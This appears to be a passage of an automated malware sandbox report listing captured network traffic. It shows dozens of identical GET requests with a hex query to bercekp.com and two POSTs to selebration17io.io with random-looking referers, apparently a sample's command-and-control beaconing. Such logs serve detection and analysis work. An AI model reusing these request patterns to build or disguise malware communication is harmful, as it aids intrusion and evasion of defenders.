                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evfqejbgnvvvmyra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrpbieiomege.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
